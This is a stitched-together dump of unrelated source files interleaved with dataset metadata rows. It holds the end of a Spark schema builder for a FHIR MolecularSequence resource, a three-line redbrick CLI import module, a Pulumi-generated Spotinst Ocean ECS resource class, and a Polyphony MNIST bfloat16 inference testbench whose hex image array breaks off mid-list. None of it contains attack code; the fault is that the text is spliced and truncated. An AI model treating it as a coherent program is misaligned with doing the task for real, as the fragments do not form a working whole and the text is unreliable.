include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path + ".gtfp",
),
True,
),
# QUERY.TP / (QUERY.TP + QUERY.FP).
StructField(
"precision",
decimalSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path + ".precision",
),
True,
),
# TRUTH.TP / (TRUTH.TP + TRUTH.FN).
StructField(
"recall",
decimalSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path + ".recall",
),
True,
),
# Harmonic mean of Recall and Precision, computed as: 2 * precision * recall /
# (precision + recall).
StructField(
"fScore",
decimalSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path + ".fscore",
),
True,
),
# Receiver Operator Characteristic (ROC) Curve to give sensitivity/specificity
# tradeoff.
StructField(
"roc",
MolecularSequence_RocSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
use_date_for=use_date_for,
parent_path=my_parent_path,
),
True,
),
]
)
if not include_extension:
schema.fields = [
c
if c.name != "extension"
else StructField("extension", StringType(), True)
for c in schema.fields
]
if not include_modifierExtension:
schema.fields = [
c
if c.name != "modifierExtension"
else StructField("modifierExtension", StringType(), True)
for c in schema.fields
]
return schema
| 51.61753
| 104
| 0.551984
| 2,524
| 25,912
| 5.431458
| 0.110143
| 0.060398
| 0.038296
| 0.056022
| 0.847837
| 0.844117
| 0.82982
| 0.804143
| 0.798454
| 0.798454
| 0
| 0.005682
| 0.402323
| 25,912
| 501
| 105
| 51.720559
| 0.879512
| 0.29029
| 0
| 0.706215
| 1
| 0
| 0.030067
| 0.005655
| 0
| 0
| 0
| 0
| 0
| 1
| 0.002825
| false
| 0
| 0.022599
| 0
| 0.033898
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
70d370d1ddb81ec16b9b23cff266655a1b5944f1
| 182
|
py
|
Python
|
redbrick/cli/entity/__init__.py
|
dereklukacs/redbrick-sdk
|
4cf93444c1d808694c1601334f9e039e616dfd3d
|
[
"MIT"
] | 1
|
2020-11-26T04:25:15.000Z
|
2020-11-26T04:25:15.000Z
|
redbrick/cli/entity/__init__.py
|
redbrick-ai/redbrick-sdk
|
4cf93444c1d808694c1601334f9e039e616dfd3d
|
[
"MIT"
] | 33
|
2021-02-04T17:51:53.000Z
|
2022-03-17T07:28:36.000Z
|
redbrick/cli/entity/__init__.py
|
dereklukacs/redbrick-sdk
|
4cf93444c1d808694c1601334f9e039e616dfd3d
|
[
"MIT"
] | 1
|
2021-06-09T10:06:35.000Z
|
2021-06-09T10:06:35.000Z
|
"""CLI project entities."""
from redbrick.cli.entity.creds import CLICredentials
from redbrick.cli.entity.conf import CLIConfiguration
from redbrick.cli.entity.cache import CLICache
| 36.4
| 53
| 0.82967
| 24
| 182
| 6.291667
| 0.541667
| 0.238411
| 0.298013
| 0.417219
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082418
| 182
| 4
| 54
| 45.5
| 0.904192
| 0.115385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
70d6b100b9ac99e1355b6c01e23766398d5be695
| 19,016
|
py
|
Python
|
sdk/python/pulumi_spotinst/ecs/ocean.py
|
timmyers/pulumi-spotinst
|
3d071aaff57f7549403aca8587b1892f40e85d6c
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_spotinst/ecs/ocean.py
|
timmyers/pulumi-spotinst
|
3d071aaff57f7549403aca8587b1892f40e85d6c
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_spotinst/ecs/ocean.py
|
timmyers/pulumi-spotinst
|
3d071aaff57f7549403aca8587b1892f40e85d6c
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class Ocean(pulumi.CustomResource):
associate_public_ip_address: pulumi.Output[bool]
"""
Configure public IP address allocation.
"""
autoscaler: pulumi.Output[dict]
"""
Describes the Ocean ECS autoscaler.
* `cooldown` (`float`) - Cooldown period between scaling actions.
* `down` (`dict`) - Auto Scaling scale down operations.
* `maxScaleDownPercentage` (`float`) - Would represent the maximum % to scale-down. Number between 1-100
* `headroom` (`dict`) - Spare resource capacity management enabling fast assignment of tasks without waiting for new resources to launch.
* `cpuPerUnit` (`float`) - Optionally configure the number of CPUs to allocate the headroom. CPUs are denoted in millicores, where 1000 millicores = 1 vCPU.
* `memoryPerUnit` (`float`) - Optionally configure the amount of memory (MB) to allocate the headroom.
* `numOfUnits` (`float`) - The number of units to retain as headroom, where each unit has the defined headroom CPU and memory.
* `isAutoConfig` (`bool`) - Automatically configure and optimize headroom resources.
* `isEnabled` (`bool`) - Enable the Ocean ECS autoscaler.
* `resourceLimits` (`dict`) - Optionally set upper and lower bounds on the resource usage of the cluster.
* `maxMemoryGib` (`float`) - The maximum memory in GiB units that can be allocated to the cluster.
* `maxVcpu` (`float`) - The maximum cpu in vCPU units that can be allocated to the cluster.
"""
cluster_name: pulumi.Output[str]
"""
The ocean cluster name.
"""
desired_capacity: pulumi.Output[float]
"""
The number of instances to launch and maintain in the cluster.
"""
draining_timeout: pulumi.Output[float]
"""
The time in seconds, the instance is allowed to run while detached from the ELB. This is to allow the instance time to be drained from incoming TCP connections before terminating it, during a scale down operation.
"""
ebs_optimized: pulumi.Output[bool]
"""
Enable EBS optimized for cluster. Flag will enable optimized capacity for high bandwidth connectivity to the EB service for non EBS optimized instance types. For instances that are EBS optimized this flag will be ignored.
"""
iam_instance_profile: pulumi.Output[str]
"""
The instance profile iam role.
"""
image_id: pulumi.Output[str]
"""
ID of the image used to launch the instances.
"""
key_pair: pulumi.Output[str]
"""
The key pair to attach the instances.
"""
max_size: pulumi.Output[float]
"""
The upper limit of instances the cluster can scale up to.
"""
min_size: pulumi.Output[float]
"""
The lower limit of instances the cluster can scale down to.
"""
monitoring: pulumi.Output[bool]
"""
Enable detailed monitoring for cluster. Flag will enable Cloud Watch detailed detailed monitoring (one minute increments). Note: there are additional hourly costs for this service based on the region used.
"""
name: pulumi.Output[str]
"""
The Ocean cluster name.
"""
region: pulumi.Output[str]
"""
The region the cluster will run in.
"""
security_group_ids: pulumi.Output[list]
"""
One or more security group ids.
"""
subnet_ids: pulumi.Output[list]
"""
A comma-separated list of subnet identifiers for the Ocean cluster. Subnet IDs should be configured with auto assign public ip.
"""
tags: pulumi.Output[list]
"""
Optionally adds tags to instances launched in an Ocean cluster.
* `key` (`str`) - The tag key.
* `value` (`str`) - The tag value.
"""
update_policy: pulumi.Output[dict]
user_data: pulumi.Output[str]
"""
Base64-encoded MIME user data to make available to the instances.
"""
utilize_reserved_instances: pulumi.Output[bool]
whitelists: pulumi.Output[list]
"""
Instance types allowed in the Ocean cluster.
"""
def __init__(__self__, resource_name, opts=None, associate_public_ip_address=None, autoscaler=None, cluster_name=None, desired_capacity=None, draining_timeout=None, ebs_optimized=None, iam_instance_profile=None, image_id=None, key_pair=None, max_size=None, min_size=None, monitoring=None, name=None, region=None, security_group_ids=None, subnet_ids=None, tags=None, update_policy=None, user_data=None, utilize_reserved_instances=None, whitelists=None, __props__=None, __name__=None, __opts__=None):
"""
Provides a Spotinst Ocean ECS resource.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] associate_public_ip_address: Configure public IP address allocation.
:param pulumi.Input[dict] autoscaler: Describes the Ocean ECS autoscaler.
:param pulumi.Input[str] cluster_name: The ocean cluster name.
:param pulumi.Input[float] desired_capacity: The number of instances to launch and maintain in the cluster.
:param pulumi.Input[float] draining_timeout: The time in seconds, the instance is allowed to run while detached from the ELB. This is to allow the instance time to be drained from incoming TCP connections before terminating it, during a scale down operation.
:param pulumi.Input[bool] ebs_optimized: Enable EBS optimized for cluster. Flag will enable optimized capacity for high bandwidth connectivity to the EB service for non EBS optimized instance types. For instances that are EBS optimized this flag will be ignored.
:param pulumi.Input[str] iam_instance_profile: The instance profile iam role.
:param pulumi.Input[str] image_id: ID of the image used to launch the instances.
:param pulumi.Input[str] key_pair: The key pair to attach the instances.
:param pulumi.Input[float] max_size: The upper limit of instances the cluster can scale up to.
:param pulumi.Input[float] min_size: The lower limit of instances the cluster can scale down to.
:param pulumi.Input[bool] monitoring: Enable detailed monitoring for cluster. Flag will enable Cloud Watch detailed detailed monitoring (one minute increments). Note: there are additional hourly costs for this service based on the region used.
:param pulumi.Input[str] name: The Ocean cluster name.
:param pulumi.Input[str] region: The region the cluster will run in.
:param pulumi.Input[list] security_group_ids: One or more security group ids.
:param pulumi.Input[list] subnet_ids: A comma-separated list of subnet identifiers for the Ocean cluster. Subnet IDs should be configured with auto assign public ip.
:param pulumi.Input[list] tags: Optionally adds tags to instances launched in an Ocean cluster.
:param pulumi.Input[str] user_data: Base64-encoded MIME user data to make available to the instances.
:param pulumi.Input[list] whitelists: Instance types allowed in the Ocean cluster.
The **autoscaler** object supports the following:
* `cooldown` (`pulumi.Input[float]`) - Cooldown period between scaling actions.
* `down` (`pulumi.Input[dict]`) - Auto Scaling scale down operations.
* `maxScaleDownPercentage` (`pulumi.Input[float]`) - Would represent the maximum % to scale-down. Number between 1-100
* `headroom` (`pulumi.Input[dict]`) - Spare resource capacity management enabling fast assignment of tasks without waiting for new resources to launch.
* `cpuPerUnit` (`pulumi.Input[float]`) - Optionally configure the number of CPUs to allocate the headroom. CPUs are denoted in millicores, where 1000 millicores = 1 vCPU.
* `memoryPerUnit` (`pulumi.Input[float]`) - Optionally configure the amount of memory (MB) to allocate the headroom.
* `numOfUnits` (`pulumi.Input[float]`) - The number of units to retain as headroom, where each unit has the defined headroom CPU and memory.
* `isAutoConfig` (`pulumi.Input[bool]`) - Automatically configure and optimize headroom resources.
* `isEnabled` (`pulumi.Input[bool]`) - Enable the Ocean ECS autoscaler.
* `resourceLimits` (`pulumi.Input[dict]`) - Optionally set upper and lower bounds on the resource usage of the cluster.
* `maxMemoryGib` (`pulumi.Input[float]`) - The maximum memory in GiB units that can be allocated to the cluster.
* `maxVcpu` (`pulumi.Input[float]`) - The maximum cpu in vCPU units that can be allocated to the cluster.
The **tags** object supports the following:
* `key` (`pulumi.Input[str]`) - The tag key.
* `value` (`pulumi.Input[str]`) - The tag value.
The **update_policy** object supports the following:
* `rollConfig` (`pulumi.Input[dict]`)
* `batchSizePercentage` (`pulumi.Input[float]`)
* `shouldRoll` (`pulumi.Input[bool]`)
> This content is derived from https://github.com/terraform-providers/terraform-provider-spotinst/blob/master/website/docs/r/ocean_ecs.html.markdown.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['associate_public_ip_address'] = associate_public_ip_address
__props__['autoscaler'] = autoscaler
if cluster_name is None:
raise TypeError("Missing required property 'cluster_name'")
__props__['cluster_name'] = cluster_name
__props__['desired_capacity'] = desired_capacity
__props__['draining_timeout'] = draining_timeout
__props__['ebs_optimized'] = ebs_optimized
__props__['iam_instance_profile'] = iam_instance_profile
__props__['image_id'] = image_id
__props__['key_pair'] = key_pair
__props__['max_size'] = max_size
__props__['min_size'] = min_size
__props__['monitoring'] = monitoring
__props__['name'] = name
if region is None:
raise TypeError("Missing required property 'region'")
__props__['region'] = region
if security_group_ids is None:
raise TypeError("Missing required property 'security_group_ids'")
__props__['security_group_ids'] = security_group_ids
if subnet_ids is None:
raise TypeError("Missing required property 'subnet_ids'")
__props__['subnet_ids'] = subnet_ids
__props__['tags'] = tags
__props__['update_policy'] = update_policy
__props__['user_data'] = user_data
__props__['utilize_reserved_instances'] = utilize_reserved_instances
__props__['whitelists'] = whitelists
super(Ocean, __self__).__init__(
'spotinst:ecs/ocean:Ocean',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None, associate_public_ip_address=None, autoscaler=None, cluster_name=None, desired_capacity=None, draining_timeout=None, ebs_optimized=None, iam_instance_profile=None, image_id=None, key_pair=None, max_size=None, min_size=None, monitoring=None, name=None, region=None, security_group_ids=None, subnet_ids=None, tags=None, update_policy=None, user_data=None, utilize_reserved_instances=None, whitelists=None):
"""
Get an existing Ocean resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] associate_public_ip_address: Configure public IP address allocation.
:param pulumi.Input[dict] autoscaler: Describes the Ocean ECS autoscaler.
:param pulumi.Input[str] cluster_name: The ocean cluster name.
:param pulumi.Input[float] desired_capacity: The number of instances to launch and maintain in the cluster.
:param pulumi.Input[float] draining_timeout: The time in seconds, the instance is allowed to run while detached from the ELB. This is to allow the instance time to be drained from incoming TCP connections before terminating it, during a scale down operation.
:param pulumi.Input[bool] ebs_optimized: Enable EBS optimized for cluster. Flag will enable optimized capacity for high bandwidth connectivity to the EB service for non EBS optimized instance types. For instances that are EBS optimized this flag will be ignored.
:param pulumi.Input[str] iam_instance_profile: The instance profile iam role.
:param pulumi.Input[str] image_id: ID of the image used to launch the instances.
:param pulumi.Input[str] key_pair: The key pair to attach the instances.
:param pulumi.Input[float] max_size: The upper limit of instances the cluster can scale up to.
:param pulumi.Input[float] min_size: The lower limit of instances the cluster can scale down to.
:param pulumi.Input[bool] monitoring: Enable detailed monitoring for cluster. Flag will enable Cloud Watch detailed detailed monitoring (one minute increments). Note: there are additional hourly costs for this service based on the region used.
:param pulumi.Input[str] name: The Ocean cluster name.
:param pulumi.Input[str] region: The region the cluster will run in.
:param pulumi.Input[list] security_group_ids: One or more security group ids.
:param pulumi.Input[list] subnet_ids: A comma-separated list of subnet identifiers for the Ocean cluster. Subnet IDs should be configured with auto assign public ip.
:param pulumi.Input[list] tags: Optionally adds tags to instances launched in an Ocean cluster.
:param pulumi.Input[str] user_data: Base64-encoded MIME user data to make available to the instances.
:param pulumi.Input[list] whitelists: Instance types allowed in the Ocean cluster.
The **autoscaler** object supports the following:
* `cooldown` (`pulumi.Input[float]`) - Cooldown period between scaling actions.
* `down` (`pulumi.Input[dict]`) - Auto Scaling scale down operations.
* `maxScaleDownPercentage` (`pulumi.Input[float]`) - Would represent the maximum % to scale-down. Number between 1-100
* `headroom` (`pulumi.Input[dict]`) - Spare resource capacity management enabling fast assignment of tasks without waiting for new resources to launch.
* `cpuPerUnit` (`pulumi.Input[float]`) - Optionally configure the number of CPUs to allocate the headroom. CPUs are denoted in millicores, where 1000 millicores = 1 vCPU.
* `memoryPerUnit` (`pulumi.Input[float]`) - Optionally configure the amount of memory (MB) to allocate the headroom.
* `numOfUnits` (`pulumi.Input[float]`) - The number of units to retain as headroom, where each unit has the defined headroom CPU and memory.
* `isAutoConfig` (`pulumi.Input[bool]`) - Automatically configure and optimize headroom resources.
* `isEnabled` (`pulumi.Input[bool]`) - Enable the Ocean ECS autoscaler.
* `resourceLimits` (`pulumi.Input[dict]`) - Optionally set upper and lower bounds on the resource usage of the cluster.
* `maxMemoryGib` (`pulumi.Input[float]`) - The maximum memory in GiB units that can be allocated to the cluster.
* `maxVcpu` (`pulumi.Input[float]`) - The maximum cpu in vCPU units that can be allocated to the cluster.
The **tags** object supports the following:
* `key` (`pulumi.Input[str]`) - The tag key.
* `value` (`pulumi.Input[str]`) - The tag value.
The **update_policy** object supports the following:
* `rollConfig` (`pulumi.Input[dict]`)
* `batchSizePercentage` (`pulumi.Input[float]`)
* `shouldRoll` (`pulumi.Input[bool]`)
> This content is derived from https://github.com/terraform-providers/terraform-provider-spotinst/blob/master/website/docs/r/ocean_ecs.html.markdown.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["associate_public_ip_address"] = associate_public_ip_address
__props__["autoscaler"] = autoscaler
__props__["cluster_name"] = cluster_name
__props__["desired_capacity"] = desired_capacity
__props__["draining_timeout"] = draining_timeout
__props__["ebs_optimized"] = ebs_optimized
__props__["iam_instance_profile"] = iam_instance_profile
__props__["image_id"] = image_id
__props__["key_pair"] = key_pair
__props__["max_size"] = max_size
__props__["min_size"] = min_size
__props__["monitoring"] = monitoring
__props__["name"] = name
__props__["region"] = region
__props__["security_group_ids"] = security_group_ids
__props__["subnet_ids"] = subnet_ids
__props__["tags"] = tags
__props__["update_policy"] = update_policy
__props__["user_data"] = user_data
__props__["utilize_reserved_instances"] = utilize_reserved_instances
__props__["whitelists"] = whitelists
return Ocean(resource_name, opts=opts, __props__=__props__)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 59.425
| 502
| 0.685265
| 2,399
| 19,016
| 5.241767
| 0.125886
| 0.062982
| 0.04835
| 0.021153
| 0.852962
| 0.833082
| 0.827594
| 0.796024
| 0.772247
| 0.769384
| 0
| 0.002323
| 0.230227
| 19,016
| 319
| 503
| 59.611285
| 0.856743
| 0.467186
| 0
| 0.018349
| 1
| 0
| 0.156193
| 0.021442
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036697
| false
| 0.009174
| 0.055046
| 0.018349
| 0.321101
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cb16386c456ac9a5d75980286bd2356667dda8a0
| 8,233
|
py
|
Python
|
mnist_bfloat.py
|
ryos36/polyphony-with-tf-mnist
|
55d2a4006436aa6a9736e56d7fb5bd49c3bc8d91
|
[
"MIT"
] | 1
|
2020-01-21T14:26:06.000Z
|
2020-01-21T14:26:06.000Z
|
mnist_bfloat.py
|
ryos36/polyphony-with-tf-mnist
|
55d2a4006436aa6a9736e56d7fb5bd49c3bc8d91
|
[
"MIT"
] | null | null | null |
mnist_bfloat.py
|
ryos36/polyphony-with-tf-mnist
|
55d2a4006436aa6a9736e56d7fb5bd49c3bc8d91
|
[
"MIT"
] | null | null | null |
import polyphony
from polyphony import testbench
from polyphony import __python__
from polyphony import unroll
from polyphony.typing import List, bit16
import bfloat
from b_bin import B_PARAM
from w_bin import W_PARAM
from img7 import IMAGE7
#polyphony.__path__.append('./polyphony')
#from polyphony.soc import offload, intern_symbol
LEN=28*28
#@offload
def do_mnist7_mem(a:List[bit16], _mem:List[bit16], lst_len = LEN):
rom_w = W_PARAM
rom_b = B_PARAM
mem = [0] * 10
xi = 0
for i in range(lst_len):
x = a[i]
for j in unroll(range(10)):
mem[j] = bfloat.mul_add(x, rom_w[xi + j], mem[j])
xi += 10
for j in range(10):
_mem[j] = bfloat.add(mem[j], rom_b[j])
@testbench
def test():
img = [0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x3ea8, 0x3f39, 0x3f1f, 0x3f17, 0x3e70, 0x3e10,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x3f5e, 0x3f7e,
0x3f7e, 0x3f7e, 0x3f7e, 0x3f71, 0x3f46, 0x3f46, 0x3f46, 0x3f46,
0x3f46, 0x3f46, 0x3f46, 0x3f46, 0x3f2a, 0x3e50, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x3e86, 0x3ee4, 0x3e90, 0x3ee4, 0x3f23, 0x3f63,
0x3f7e, 0x3f61, 0x3f7e, 0x3f7e, 0x3f7e, 0x3f7a, 0x3f65, 0x3f7e,
0x3f7e, 0x3f0c, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x3d88, 0x3e84, 0x3d60, 0x3e86, 0x3e86,
0x3e86, 0x3e6c, 0x3da8, 0x3f6c, 0x3f7e, 0x3ed4, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x3ea6, 0x3f7d,
0x3f51, 0x3d90, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x3db0, 0x3f69, 0x3f80, 0x3ea6, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x3f01, 0x3f7e, 0x3f6e,
0x3e30, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x3e6c, 0x3f79, 0x3f7e, 0x3e78, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x3f05, 0x3f7e, 0x3f3b, 0x3ca0,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x3d10,
0x3f4d, 0x3f78, 0x3e68, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x3efc, 0x3f7e, 0x3f36, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x3e96, 0x3f7b,
0x3f70, 0x3e64, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x3d98, 0x3f5d, 0x3f7e, 0x3f26, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x3c40, 0x3f4b, 0x3f7e, 0x3f5b,
0x3e0c, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x3e18, 0x3f7e, 0x3f7e, 0x3e9a, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x3df8, 0x3f60, 0x3f7e, 0x3ee6, 0x3b80,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x3f05,
0x3f7e, 0x3f7e, 0x3e50, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
